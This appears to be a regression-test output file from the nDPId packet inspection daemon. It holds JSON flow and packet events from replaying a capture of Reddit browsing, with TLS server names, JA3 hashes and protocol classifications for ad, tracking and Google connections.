-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605291688324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688324,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjQAAAAAoAL9INe7AAACBAWgBAIICn8mSwwAAAAAAQMDBw=="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3358,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688336,"flow_last_seen":1605291688336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688336,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3358,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1605291688336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688336,"pkt":"qtsDr8lk5EKm5WPyht1gC0OFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx54BuzYIpzgAAAAAoAL9IOr4AAACBAWgBAIICn8mSxgAAAAAAQMDBw=="} -00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3372,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688344,"flow_last_seen":1605291688344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688344,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3372,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605291688344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688344,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACgGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmAAAAAAoAL9ICpwAAACBAWgBAIICgi3lpgAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605291688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688365,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnC63k25KV6Y1oBJXgLbhAAACBAV4AQMDAwQCCArC10GYfyZLDA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1605291688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688365,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjUut5NvgBAB+zrKAAABAQgKfyZLNcLXQZg="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688324,"flow_last_seen":1605291688365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688365,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605291688370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688370,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnlMkjxA2CKc5oBJXgKoEAAACBAV4AQMDAwQCCArC10GjfyZLGA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605291688370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688370,"pkt":"qtsDr8lk5EKm5WPyht1gC0OFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx54BuzYIpzlTJI8RgBAB+y30AAABAQgKfyZLOsLXQaM="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688336,"flow_last_seen":1605291688371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688371,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605291688371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688371,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAkAAhnO4AAAZE4\/jAk6EqAcsBIEmLB5kd7IUo3\/YpAbvbeuzTe9OJtD5hoBJXgGMHAAACBAV4AQMDAwQCCArC10GlCLeWmA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605291688371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688371,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACAGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmHs03vUgBAB++b9AAABAQgKCLeWs8LXQaU="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688344,"flow_last_seen":1605291688372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688372,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3517,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688324,"flow_last_seen":1605291688408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688336,"flow_last_seen":1605291688408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688344,"flow_last_seen":1605291688411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688411,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688611,"flow_last_seen":1605291688611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688611,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605291688611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688611,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z44AAAAAoAL9IIe6AAACBAWgBAIICvY2BR4AAAAAAQMDBw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3908,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605291688654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688654,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNBoNFCkHQgeCALYqAcsBIEmLB5kd7IUo3\/YpAbubOJS20cTxd2ePoBJXgMFkAAACBAV4AQMDAwQCCArC10K+9jYFHg=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3910,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605291688654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688654,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z4+UttHFgBAB+0VLAAABAQgK9jYFScLXQr4="} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3911,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688611,"flow_last_seen":1605291688654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688611,"flow_last_seen":1605291688705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605291688705,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688712,"flow_last_seen":1605291688712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688712,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1605291688712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688712,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQQAAAAAoAL9IGnKAAACBAWgBAIICoWLJ5EAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688749,"flow_last_seen":1605291688749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688749,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1605291688749,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688749,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7IAAAAAoAL9ICgwAAACBAWgBAIICm3\/yPIAAAAAAQMDBw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4156,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1605291688754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688754,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAYqAcsBIEmLB5kd7IUo3\/YpAbvVxjGyAqhUIR0FoBJXgNU8AAACBAV4AQMDAwQCCArC10MXhYsnkQ=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4158,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1605291688754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688754,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQUxsgKpgBAB+1kkAAABAQgKhYsnu8LXQxc="} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4161,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688712,"flow_last_seen":1605291688754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688754,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4267,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1605291688786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688786,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbvfwoEYYXPjQDuzoBJXgOVIAAACBAV4AQMDAwQCCArC10M\/bf\/I8g=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4268,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1605291688786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688786,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7OBGGF0gBAB+2k0AAABAQgKbf\/JGMLXQz8="} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4269,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688749,"flow_last_seen":1605291688786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688786,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4414,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688712,"flow_last_seen":1605291688813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688813,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688830,"flow_last_seen":1605291688830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688830,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1605291688830,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688830,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5AAAAAAoAL9IFwjAAACBAWgBAIICu7gTZEAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4499,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688831,"flow_last_seen":1605291688831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688831,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 